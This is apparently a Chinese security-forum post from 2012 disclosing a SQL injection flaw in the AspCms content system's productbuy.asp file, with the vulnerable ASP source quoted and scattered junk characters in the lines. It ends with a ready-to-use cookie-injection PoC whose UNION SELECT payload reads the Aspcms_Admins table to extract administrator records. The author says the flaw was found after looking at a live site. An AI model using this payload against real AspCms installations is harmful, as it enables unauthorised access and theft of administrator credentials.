好久没上土司了,上来一看发现在删号名单内...../ n/ |2 d" H! M" q* F
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。* O9 N2 @3 i. m; E1 t9 g1 C
废话不多说,看代码:
7 ?/ C* @: K6 D, n+ O8 n+ F# p( E
* s6 I4 x) C8 ]" V$ S& M- p<%8 C& s) f+ {3 k
0 t! E9 v$ `9 D% d2 t0 h2 Dif action = "buy" then' m* R0 w6 {3 P* l: I# Q- k
8 W& H2 I3 Z6 C* j/ Z( d
addOrder()
( \& }; v- ~0 ^; E9 J- O9 l
}1 K8 s/ J8 kelse& ~' C1 N9 k7 { i9 P0 X. y
& G0 A- z( \/ w9 }# Z; g. n3 ^ echoContent()
1 H8 w$ t( B E% ]% b2 N2 X- G! [2 r( Y4 u
end if
, S/ h0 `' \2 J$ @! U1 g$ l% ^, i: v
/ n' V E& R3 Z6 q# k
) K3 R2 D: _/ P/ V# _" @
……略过
' P" O6 o. V& s f
2 H2 x8 w2 M$ [! v$ q1 K4 Y2 I6 E; Q% S0 r/ Y* U7 `
# T9 M" z1 ~) v7 H7 VSub echoContent(), d' @1 `7 L6 Y( X. H/ }4 p, O' `
8 D9 E6 J Q- w6 A7 h
dim id" s1 y D6 k% J9 M" O( K7 T) N
- n0 V( s8 ?; f @5 w) x5 E+ d% j id=getForm("id","get")9 c! D' @8 N4 J
6 B( q3 S; J y7 w
7 [( s6 u8 l5 z3 A
+ D, d; D8 X9 w/ K3 d2 g if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" + N/ D# f. h+ H6 G% A
$ q" {$ R5 ^, J2 c' f" o' x
S, q1 Z2 n- G z2 t! z
/ F9 `& b* y1 \; A5 W dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")- D7 g. V/ u; ?# a
' x9 y8 T1 ?* {$ ~ dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct4 p% Z; U' ]2 H; c3 w/ j3 \
9 b3 [4 |. z. f% }7 z2 C% Q( r Dim templatePath,tempStr
: U$ O8 T0 \; ~- a( g' \0 I& i9 K% p. Y" _& L; @
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
4 K U5 \1 `" q( y; P! X6 J0 E; W4 |; H; ^* a( N/ D* j) ?' {
) M/ V' c) I9 o/ {$ w* l$ X
$ J+ [: R% K: X3 E# T: ^& o7 s
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")& V5 h0 y3 {# {$ f8 `
; l) ?3 g6 L/ _0 m3 k) `/ m6 \ selectproduct=rsObj(0)
" V9 B1 P4 [: c& ?8 @+ } q- x3 |6 V5 d/ C
! r! u, G# T$ |! [" x |4 p. B5 _ ?5 {4 l- z1 G4 q$ S2 q
Dim linkman,gender,phone,mobile,email,qq,address,postcode- f9 t& Y6 K# G
/ |* q& w X; a8 B if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
3 e' {1 Q- i% l1 @7 L7 m
' z0 w: J* n* P9 r if rCookie("loginstatus")=1 then
) O }1 `5 f3 V9 I( b: {' d( ~% G* [5 Q* P/ ^ d
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
8 v. l8 w6 v2 z& B) t: a5 j) j5 C4 K# v1 V' k2 I4 m
linkman=rsObj("truename")1 I" h/ O# Z/ b# M/ H( l: J& U. L
# E. x% m) R- l, _
gender=rsObj("gender")' z# n: k/ M3 a& Z0 \; {" P1 x
/ L. V/ t5 L' Z- }8 Y" | phone=rsObj("phone")
+ D( I d. ~. R. g
! _' ]- V/ _4 Y8 P/ y mobile=rsObj("mobile")' O4 s# F9 i# G
8 q! J; e" M+ i4 ^* R$ o email=rsObj("email")
" }) R/ c6 Y) D/ [& o1 p* u' K v
# f! r8 n4 O, G) R' }1 R# X qq=rsObj("qq")" [" U: F8 O5 u$ s0 a+ y& t
2 k7 W6 g9 Y/ u/ L# w. v
address=rsObj("address")
2 }9 s5 j \$ [
' H$ D' j0 m" i, _ postcode=rsObj("postcode")" D6 T- J, Z0 \' i
1 K2 x$ L% _: T2 ~
else
; \9 l' N, @4 Q' w( B# `" x( B4 O: I# s: \- t
gender=1
+ b6 d$ w7 V- X) b* }* B6 {7 T& e2 _3 H# W0 r! Z) G, Y
end if, [( z. }$ c' p' ~
4 t5 I' w7 L/ {. y1 ]5 f! r
rsObj.close()$ ?6 I1 o- R7 W! _) r2 Y# j6 g' J
* k1 q: C# D6 z
, q( i2 u+ B6 A
) ~: M9 D. ?4 Z5 n with templateObj
, C& w- I9 I0 q: J4 ^# O9 K
) ?! x" I. M) P( R .content=loadFile(templatePath)
% P; ~8 M' u2 f9 P4 }9 ], X/ c
% o9 _1 Q, J3 k; L) n4 l .parseHtml()
' i+ C# A6 t" J/ i; Q; L; `/ Z7 l4 o9 W0 r0 v
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)7 b0 `) L y5 J
% F J$ M3 z7 B% u: q .content=replaceStr(.content,"[aspcms:linkman]",linkman) # b- [1 [6 a) T4 b7 X. V2 e7 C3 Z( s
0 j' k! [/ _9 u! d" { E, F1 m .content=replaceStr(.content,"[aspcms:gender]",gender) p- X( J0 g, E8 q
. }1 s {! r9 ?! U .content=replaceStr(.content,"[aspcms:phone]",phone) . [: D9 j; i! I2 d
! y$ E. J; h* l0 H
.content=replaceStr(.content,"[aspcms:mobile]",mobile) % N" |3 X, B. }- ^! u* Z0 F
' l0 H. d% U9 O
.content=replaceStr(.content,"[aspcms:email]",email)
" R/ |- h- r8 `- [. q0 i% p; e; _" L5 N$ U" H5 Q! ]* P8 k& H. j( O
.content=replaceStr(.content,"[aspcms:qq]",qq)
. x+ J6 @. X$ b5 I* B5 p
! ^9 e8 t' [3 [+ E& V" ~ .content=replaceStr(.content,"[aspcms:address]",address)
+ T: e# ?; _" V; O
4 E: ~3 P+ i# S0 X1 s+ ~8 t% o .content=replaceStr(.content,"[aspcms:postcode]",postcode) ! ^5 d* [) ]6 |% \% e. p0 x' Z1 a
, i2 P/ c: Z0 B2 f2 v6 w
.parseCommon()
) R9 u! d0 K; p8 G
! v1 a$ t! ?9 \- _: \+ k2 h. n3 y v echo .content - Y+ H7 M' o% x3 T/ c5 b: ]
) U/ w a$ ]% |: W8 f B) X end with
, A& U A$ C& s; J N
$ ]9 i$ D" y$ s3 N0 M+ T set templateobj =nothing : terminateAllObjects7 R1 F2 o4 h5 J# |
& M! S# i1 v7 KEnd Sub5 A8 U- X# t( G* k) K& W* Q
漏洞很明显,没啥好说的
# U3 k" I4 ~4 Y J4 ~) vpoc:
! a- \) D6 A; C( s' ` _ O- K+ q' C2 ~$ E" L6 j7 u
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子# ?- `3 s7 E: O$ r, b5 }- W
, u2 M8 w9 U# `" n |
发表于 2012-12-27 08:35:05
收藏
支持
反对